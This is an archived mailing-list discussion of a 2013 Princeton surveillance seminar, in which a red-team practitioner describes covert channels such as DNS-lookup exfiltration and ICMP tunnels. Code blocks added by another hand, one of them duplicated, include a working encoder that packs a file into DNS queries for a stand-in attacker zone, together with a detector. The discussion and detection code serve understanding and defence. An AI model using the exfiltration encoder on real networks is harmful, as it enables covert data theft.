Fwd: COS 597G: Surveillance and Countermeasures, Fall 2013


Owen Densmore
Another gem from twitter:
Ed Felten
Preliminary syllabus for my "Surveillance and Countermeasures" seminar: http://ow.ly/oHs9a 
Retweeted by BrendanEich

http://www.cs.princeton.edu/courses/archive/fall13/cos597G/

Sounds fascinating .. and not all tech, lots of history and spy craft.

   -- Owen


============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com

Re: Fwd: COS 597G: Surveillance and Countermeasures, Fall 2013

cody dooderson
that seems like a very cool reading list. Are you thinking of starting up a reading group?

Cody Smith


On Mon, Sep 9, 2013 at 10:09 AM, Owen Densmore <[hidden email]> wrote:

Re: Fwd: COS 597G: Surveillance and Countermeasures, Fall 2013

Steve Smith
Cody -


I think you just started one (by asking). 

I suggest a Google Group for discussion and following the class schedule even if we don't have the benefit of lecture and class discussions. 

3 or more is a good number... if Owen's alerting us indicates interest, we already have a Quorum!?

- Steve

Re: Fwd: COS 597G: Surveillance and Countermeasures, Fall 2013

Tom Johnson
I'm in.  A number of journos are interested in/worried about this.
-tj


On Mon, Sep 9, 2013 at 12:30 PM, Steve Smith <[hidden email]> wrote:
--
==========================================
J. T. Johnson
Institute for Analytic Journalism   --   Santa Fe, NM USA
505.577.6482(c)                                    505.473.9646(h)
Twitter: jtjohnson
http://www.jtjohnson.com                  [hidden email]
==========================================


Re: Fwd: COS 597G: Surveillance and Countermeasures, Fall 2013

Steve Smith
I don't know if anyone (else) is doing the reading for this course....

I lagged a bit but am just now catching up... the first 5 readings were history/law and *very* timely and relevant to the current situation with the NSA, etc.  


The following are more technical:
Secure Email
Tor (secure - obfuscated?) Routing
Network Traffic Analysis
Steganography
Covert Channels
Chat (off the record)
.....
I've done my time working with or studying all of these at a fairly limited level and found each of the resources offered to be very well chosen...  a good review for me and a good introduction for anyone with modest technical knowledge.    They are also "bite sized"... I find the reading assignment for each week requiring less than an hour, though one can use these as a point of departure that could consume a whole week!

I'm glad to hear that our best and brightest are being taught these things.

- Steve

Re: Fwd: COS 597G: Surveillance and Countermeasures, Fall 2013

Steve Smith
Forgot to relate the tidbit that motivated me to update the group:

The "Covert Channels" reading, which is a very specialized example of Steganography (by my measure) has some very clever ideas in it which I'd never encountered before...   all kind of obvious once described but nevertheless quite clever.

- Steve

Re: Fwd: COS 597G: Surveillance and Countermeasures, Fall 2013

Owen Densmore
Fascinating that all the material is online via the course calendar.  Good stuff.

   -- Owen


On Fri, Oct 18, 2013 at 8:27 PM, Steve Smith <[hidden email]> wrote:

Re: [EXTERNAL] Re: Fwd: COS 597G: Surveillance and Countermeasures, Fall 2013

Parks, Raymond
WRT the Covert Channels paper - 

  Header extensions and IP options are not actually practical channels.  They sound good but in practice they run afoul of the problem that network equipment, particularly routers, process packets in hardware - unless they have unusual extensions or IP Options, in which case the packets are thrown up to the software layer.  That means they will be slower, all through the Internet, and they are easily detected.

  We've used the IPID trick but not for a covert channel.  We wanted to be able to distinguish our traffic from actual attackers (use control for red teams), so we created an HMAC of the packet and inserted the first few bytes into the IPID field.  At the target's end, they can use a tool fed from tcpdump or other appropriate tool and check whether the IPID bytes match our expected value - we use a shared secret salt.

  Most of the other tricks are low bandwidth - not really useful for gigabytes of information.

  The two most commonly used covert channels in current malware are HTTP and DNS.  The sheer volume of HTTP makes it impractical to catch all requests - many typical, public web pages include requests to dozens of web sites other than the primary one.  The many web-bug tricks and advertising spyware activities make this a really large pool of bits in which an adversary can hide.  We've used the trick of sending data out as DNS lookups against customer networks and it works like a charm.  We literally showed a security manager (later the CISO for the organization) the exfiltration and he didn't believe it twice, despite the evidence of displaying the exfiltrated file on our external web site.

  I have a copy of the Loki source code (very clean) and sending unrequested ICMP echo responses still works in some places.  The author of Loki, who went by the name Mixter, created another covert channel that simply uses alternate IP protocols.  Some routers will route any IP protocol by default while others will only route those IP protocols explicitly specified.

Ray Parks
Consilient Heuristician/IDART Program Manager
V: 505-844-4024  M: 505-238-9359  P: 505-951-6084
SIPR: [hidden email] (send NIPR reminder)
JWICS: [hidden email] (send NIPR reminder)



On Oct 18, 2013, at 8:27 PM, Steve Smith wrote:

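The IPID tagging scheme Ray describes above, written out as an added example that is not his team's tool (the message does not say which hash, which header fields, or how many bytes they used). Everything specific here is an assumption of the example: HMAC-SHA256, the covered fields (source, destination, protocol and transport payload, chosen because routers do not rewrite them), a 16-bit truncation because that is all the identification field holds, and the secret value. The sender side builds a minimal IPv4 header with the tag in the identification field; the receiver side parses a captured packet, recomputes the tag and decides whether the packet was the red team's.

```python
import hashlib
import hmac
import ipaddress
import struct

SHARED_SECRET = b"constructed-red-team-secret"  # assumption: shared out of band with the defenders


def ipv4_checksum(data):
    """Standard one's-complement checksum over an IPv4 header."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ipid_tag(secret, src, dst, proto, payload):
    """First 16 bits of HMAC-SHA256 over fields that survive transit unchanged.

    TTL, checksum and ToS are excluded because routers rewrite them.  The set of
    covered fields and the choice of SHA-256 are assumptions of this example.
    """
    msg = (ipaddress.IPv4Address(src).packed + ipaddress.IPv4Address(dst).packed
           + bytes([proto]) + payload)
    return struct.unpack("!H", hmac.new(secret, msg, hashlib.sha256).digest()[:2])[0]


def build_packet(src, dst, proto, payload, ident, ttl=64):
    """Minimal IPv4 header (no options) with the given identification field."""
    hdr = struct.pack("!BBHHHBBH4s4s",
                      (4 << 4) | 5, 0, 20 + len(payload), ident, 0, ttl, proto, 0,
                      ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    hdr = hdr[:10] + struct.pack("!H", ipv4_checksum(hdr)) + hdr[12:]
    return hdr + payload


def tag_packet(secret, src, dst, proto, payload):
    """Red-team side: emit the packet with the HMAC tag in the IPID field."""
    return build_packet(src, dst, proto, payload, ipid_tag(secret, src, dst, proto, payload))


def parse_packet(packet):
    """Pull the fields the verifier needs out of a captured IPv4 packet."""
    f = struct.unpack("!BBHHHBBH4s4s", packet[:20])
    ihl = (f[0] & 0x0F) * 4
    return {"src": str(ipaddress.IPv4Address(f[8])), "dst": str(ipaddress.IPv4Address(f[9])),
            "proto": f[6], "ident": f[3], "payload": packet[ihl:f[2]]}


def is_red_team(secret, packet):
    """Blue-team side: recompute the tag from the capture and compare in constant time."""
    p = parse_packet(packet)
    expected = ipid_tag(secret, p["src"], p["dst"], p["proto"], p["payload"])
    return hmac.compare_digest(struct.pack("!H", p["ident"]), struct.pack("!H", expected))


def classify_capture(secret, packets):
    """Label each captured packet.  A 16-bit tag means roughly 1 in 65536 foreign
    packets will match by chance, so this is attribution, not authentication."""
    return ["red-team" if is_red_team(secret, pkt) else "unattributed" for pkt in packets]


if __name__ == "__main__":
    # constructed sample: one tagged packet and a copy with the IPID flipped
    pkt = tag_packet(SHARED_SECRET, "10.0.0.5", "192.0.2.10", 6, b"GET / HTTP/1.0\r\n")
    tampered = pkt[:4] + bytes([pkt[4], pkt[5] ^ 1]) + pkt[6:]
    print(classify_capture(SHARED_SECRET, [pkt, tampered]))
```

In practice the verifier would be fed from tcpdump or a pcap rather than from constructed bytes, and it must tolerate the cases where the identification field is not preserved: some stacks send a zero IPID on packets with the don't-fragment bit set, and NAT devices and other middleboxes may rewrite it, so a missing tag is weak evidence while a matching tag is strong evidence.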
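The DNS-lookup exfiltration trick Ray mentions, and what a defender would look for in the resolver logs, as an added example that is not his team's tool or anything from the course reading. The encoder turns a file into query names under an attacker-controlled zone, the decoder reassembles the file from a capture of those names in any order, and the detector scores each zone by how many distinct, long, high-entropy subdomains it receives. The zone name, the base32 label layout, the sample data, the benign background queries and the detector thresholds are all constructed for the example.

```python
import base64
import hashlib
import math
from collections import defaultdict

MAX_LABEL = 63   # RFC 1035 label limit
MAX_NAME = 253   # practical limit for a presentation-format name


def encode_queries(data, domain, session="s1", chunk_bytes=30):
    """Split data into names <session>.<seq>.<base32...>.<domain>.

    base32 is used because resolvers may fold case, which would corrupt base64;
    the '=' padding is stripped because it is not valid in a label.
    """
    queries = []
    for seq, off in enumerate(range(0, len(data), chunk_bytes)):
        b32 = base64.b32encode(data[off:off + chunk_bytes]).decode().rstrip("=").lower()
        labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
        name = ".".join([session, str(seq)] + labels + [domain])
        if len(name) > MAX_NAME:
            raise ValueError("chunk_bytes too large for a single query name")
        queries.append(name)
    return queries


def decode_queries(queries, domain, session="s1"):
    """Reassemble the data from captured query names, whatever order they arrived in."""
    suffix = "." + domain
    chunks = {}
    for name in queries:
        if not name.endswith(suffix):
            continue
        labels = name[:-len(suffix)].split(".")
        if len(labels) < 3 or labels[0] != session:
            continue
        b32 = "".join(labels[2:]).upper()
        b32 += "=" * (-len(b32) % 8)        # restore the padding stripped by the encoder
        chunks[int(labels[1])] = base64.b32decode(b32)
    return b"".join(chunks[k] for k in sorted(chunks))


def shannon_entropy(s):
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def suspicious_zones(query_log, min_unique=10, min_label_len=30, min_entropy=3.5):
    """Flag zones that receive many distinct, long, high-entropy subdomain labels.

    Assumption of this example: the zone is the last two labels.  A real detector
    would use the public suffix list and a per-client baseline instead of fixed cut-offs.
    """
    per_zone = defaultdict(set)
    for name in query_log:
        labels = name.lower().rstrip(".").split(".")
        if len(labels) < 3:
            continue
        per_zone[".".join(labels[-2:])].add(".".join(labels[:-2]))
    flagged = {}
    for zone, subs in per_zone.items():
        if len(subs) < min_unique:
            continue
        longest = [max(sub.split("."), key=len) for sub in subs]
        mean_len = sum(len(l) for l in longest) / len(longest)
        mean_ent = sum(shannon_entropy(l) for l in longest) / len(longest)
        if mean_len >= min_label_len and mean_ent >= min_entropy:
            flagged[zone] = {"unique": len(subs), "mean_len": round(mean_len, 1),
                             "mean_entropy": round(mean_ent, 2)}
    return flagged


def sample_secret(n=450):
    """Constructed sample: deterministic pseudo-random bytes standing in for a stolen file."""
    out, block = b"", b"seed"
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return out[:n]


# constructed benign background traffic for the detector
BENIGN_QUERIES = [
    "www.example.org", "mail.example.org", "api.github.com", "static.xx.fbcdn.net",
    "i.ytimg.com", "ocsp.digicert.com", "cdn-assets-01.akamaihd.net", "safebrowsing.googleapis.com",
]
EXFIL_DOMAIN = "ns1.exfil-example.net"   # hypothetical attacker-controlled zone

if __name__ == "__main__":
    secret = sample_secret()
    queries = encode_queries(secret, EXFIL_DOMAIN)
    assert decode_queries(list(reversed(queries)), EXFIL_DOMAIN) == secret
    print(suspicious_zones(BENIGN_QUERIES + queries))
```

The channel works because the internal resolver forwards every lookup for an unknown name out to the zone's authoritative server, so the attacker's server sees the labels even when the host itself has no direct Internet access; the detector side is the part that usually does not exist, which is why the demonstration Ray describes surprised its audience. Low per-query capacity (a few dozen bytes) is offset by the fact that nothing rate-limits ordinary DNS.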

Re: [EXTERNAL] Re: Fwd: COS 597G: Surveillance and Countermeasures, Fall 2013

Steve Smith
Ray -

Great real-world report... my direct experience in all this is dated by at least 6 years, but most of it nearly 10 years old now...  time flies!

The only question I have about your response below is about the question of bandwidth...  while *some* important data/secrets are large, many are not...  a leak is a leak, no?  And an effective (albeit low bandwidth) covert channel can leak a LOT over enough time?

- Steve

Re: [EXTERNAL] Re: Fwd: COS 597G: Surveillance and Countermeasures, Fall 2013

Parks, Raymond
Files in modern systems tend to grow faster than Moore's law.  It's possible to exfiltrate some information via low bandwidth channels - but the type of information that is of high value is frequently either related to system access or to legacy systems.  If one has enough access to create a covert channel, then getting the root password is OBE.  Hopefully, legacy systems that are important enough that an adversary might want to send out info about them are not storing that info where a covert channel has external access.  There are probably edge cases - but knowing in advance of that situation is unlikely, so one would install a high-bandwidth covert channel by default.

Ray Parks
Consilient Heuristician/IDART Program Manager
V: 505-844-4024  M: 505-238-9359  P: 505-951-6084
SIPR: [hidden email] (send NIPR reminder)
JWICS: [hidden email] (send NIPR reminder)



On Oct 21, 2013, at 1:26 PM, Steve Smith wrote:

Ray -

Great real-world report... my direct experience in all this is dated by at least 6 years, but most of it nearly 10 years old now...  time flies!

The only question I have about your response below is about the question of bandwidth...  while *some* important data/secrets are large, many are not...  a leak is a leak, no?  And an effective (albeit low bandwidth) covert channel can leak a LOT over enough time?

- Steve
WRT the Covert Channels paper - 

  Header extensions and IP options are not actually practical channels.  They sound good but in practice they run afoul of the problem that network equipment, particularly routers, processes packets in hardware - unless they have unusual extensions or IP Options, in which case the packets are thrown up to the software layer.  That means they will be slower, all through the Internet, and they are easily detected.

  We've used the IPID trick but not for a covert channel.  We wanted to be able to distinguish our traffic from actual attackers (use control for red teams), so we created an HMAC of the packet and inserted the first few bytes into the IPID field.  At the target's end, they can use a tool fed from tcpdump or other appropriate tool and check whether the IPID bytes match our expected value - we use a shared secret salt.

  Most of the other tricks are low bandwidth - not really useful for gigabytes of information.

  The two most commonly used covert channels in current malware are http and DNS.  The sheer volume of http makes it impractical to catch all requests - many typical, public, web-pages include requests to dozens of web-sites other than the primary one.  The many web-bug tricks and advertising spyware activities make this a really large pool of bits in which an adversary can hide.  We've used the trick of sending data out as DNS lookups against customer networks and it works like a charm.  We literally showed a security manager (later the CISO for the organization) the exfiltration and he didn't believe it twice, despite the evidence of displaying the exfiltrated file on our external web-site.

  I have a copy of the Loki source code (very clean) and sending unrequested ICMP echo responses still works in some places.  The author of Loki, who went by the name Mixter, created another covert channel that simply uses alternate IP protocols.  Some routers will route any IP protocol by default while others will only route those IP protocols explicitly specified.

Ray Parks
Consilient Heuristician/IDART Program Manager
V: 505-844-4024  M: 505-238-9359  P: 505-951-6084
SIPR: [hidden email] (send NIPR reminder)
JWICS: [hidden email] (send NIPR reminder)



On Oct 18, 2013, at 8:27 PM, Steve Smith wrote:

Forgot to relate the tidbit that motivated me to update the group:

The "Covert Channels" reading, which is a very specialized example of Steganography (by my measure) has some very clever ideas in it which I'd never encountered before...   all kind of obvious once described but nevertheless quite clever.

- Steve

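The IPID marking Ray describes for telling authorized red-team traffic apart from real attacker traffic, as an added example rather than the poster's own tool: the sender computes an HMAC over the packet with a shared secret and writes its first two bytes into the IP ID field, and a checker at the target's end recomputes the tag from captured packets. Which header fields the HMAC covers, the placeholder secret and the sample records are assumptions made here.

```python
import hashlib
import hmac
import ipaddress
import struct

# Shared secret ("salt") agreed between the red team and the target's
# monitoring staff.  Placeholder value; a real deployment uses a random key.
SHARED_SECRET = b"example-red-team-salt"


def ipid_tag(secret: bytes, src: str, dst: str, proto: int, payload: bytes) -> int:
    """16-bit IP ID value that marks a packet as red-team traffic.

    Assumption: the HMAC covers only fields that survive transit unchanged
    (addresses, protocol, payload); TTL and the header checksum are left out
    because routers rewrite them.  The post only says "an HMAC of the packet".
    """
    msg = (ipaddress.ip_address(src).packed
           + ipaddress.ip_address(dst).packed
           + struct.pack("!B", proto)
           + payload)
    digest = hmac.new(secret, msg, hashlib.sha256).digest()
    return struct.unpack("!H", digest[:2])[0]


def is_red_team_packet(secret: bytes, src: str, dst: str, proto: int,
                       payload: bytes, ipid: int) -> bool:
    """Checker run at the target's end, e.g. over fields parsed from tcpdump."""
    expected = struct.pack("!H", ipid_tag(secret, src, dst, proto, payload))
    observed = struct.pack("!H", ipid & 0xFFFF)
    return hmac.compare_digest(expected, observed)


def classify(secret: bytes, records):
    """Split (src, dst, proto, payload, ipid) records into red-team traffic
    and everything else, so analysts can set the exercise traffic aside."""
    red_team, other = [], []
    for rec in records:
        src, dst, proto, payload, ipid = rec
        bucket = red_team if is_red_team_packet(secret, src, dst, proto, payload, ipid) else other
        bucket.append(rec)
    return red_team, other


def sample_records():
    """Constructed capture: two packets tagged by the red-team sender and one
    ordinary packet whose IP ID was chosen by the host's stack (here forced
    to differ from the tag so the sample is deterministic)."""
    flows = [("10.0.0.5", "192.0.2.10", 6, b"GET /login HTTP/1.1\r\n"),
             ("10.0.0.5", "192.0.2.10", 6, b"POST /api HTTP/1.1\r\n")]
    tagged = [f + (ipid_tag(SHARED_SECRET, *f),) for f in flows]
    plain = ("198.51.100.7", "192.0.2.10", 6, b"GET / HTTP/1.1\r\n")
    untagged = plain + ((ipid_tag(SHARED_SECRET, *plain) + 1) & 0xFFFF,)
    return tagged + [untagged]


if __name__ == "__main__":
    red, rest = classify(SHARED_SECRET, sample_records())
    print(f"red-team packets: {len(red)}, other packets: {len(rest)}")
```

A 16-bit tag leaves roughly a 1-in-65536 chance that an unrelated packet matches by accident, and middleboxes that fragment or rewrite the IP ID will break the check, so it is a filter for exercise traffic rather than proof of origin.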

Re: [EXTERNAL] Fwd: COS 597G: Surveillance and Countermeasures, Fall 2013

Parks, Raymond
I am amused at the "State-Sponsored Malware" segment - the two papers cover the two extremes of the range of activities.

One up and coming area that the course covers peripherally but not directly is the new/old vulnerabilities in mobile apps.  When Tim B-L invented the World-Wide Web, his model for use was that every user would have a web-page, their home page, and users would visit each others' pages - a peer-to-peer model in which each participant operated a web-server as well as a web-browser.  As the WWW was commercialized, it morphed into a loose client-server model in which web-servers are the province of those with content and resources while most users are consumers using a browser.  The architecture of smartphones and apps is such that it is a return to the original model but with a twist.  Almost all apps on smartphones are both a web-browser-client and a web-server.  This means that all of the vulnerabilities and mistakes that still exist throughout the WWW web-servers are being reproduced in smartphone apps.

As far as privacy is concerned - I'm surprised that there is no discussion of "big data" and how to attack it to protect one's privacy.

Ray Parks
Consilient Heuristician/IDART Program Manager
V: 505-844-4024  M: 505-238-9359  P: 505-951-6084
SIPR: [hidden email] (send NIPR reminder)
JWICS: [hidden email] (send NIPR reminder)

Re: [EXTERNAL] Fwd: COS 597G: Surveillance and Countermeasures, Fall 2013

Marcus G. Daniels
On 10/22/2013 05:43 PM, Parks, Raymond wrote:
> As far as privacy is concerned - I'm surprised that there is no
> discussion of "big data" and how to attack it to protect one's privacy.
>
The absence of that discussion is one defense.  :-)

Marcus


Re: [EXTERNAL] Fwd: COS 597G: Surveillance and Countermeasures, Fall 2013

Parks, Raymond
I don't mean attack the servers and systems - I mean the tradecraft necessary to keep big data algorithms from tracking.  That's knowledge that the protagonists of big data need if they hope to be effective in detecting sophisticated adversaries.

Ray Parks


Re: [EXTERNAL] Fwd: COS 597G: Surveillance and Countermeasures, Fall 2013

Marcus G. Daniels
On 10/22/13 7:49 PM, Parks, Raymond wrote:
> I don't mean attack the servers and systems - I mean the tradecraft necessary to keep big data algorithms from tracking.  That's knowledge that the protagonists of big data need if they hope to be effective in detecting sophisticated adversaries.
>
There seems to be an assumption that individuals who might wish to `challenge an organization' do so because they've been indoctrinated somehow.   That there must be another party, a command and control, a boss, or at least conspirators behind any individual action and all that's needed is to uncover it.   Thus the rationale for surveillance.

Yet, reflecting on my own motivations, I separate those goals where I see true opportunity or intrinsic merit from those goals where I'm one of many possible hired guns doing some job.  Frequently, I find that I make observations that yield the same conclusions that some of my colleagues do.  We share the same inputs and arrive at the same outputs, but do not coordinate or communicate in the process. To me, this kind of pure resonance is one basis for trust in the judgement of others as well as self-confidence.

With such people, I do not need to worry much about how they will plan out and execute a project.   They just will.   Those that I have reason to believe share values similar to mine will probably even arrive at a result near to what I would do.

What I meant originally is that a foolproof way to defeat big data (mining) or direct surveillance is to not communicate, but to be of like mind.

Marcus
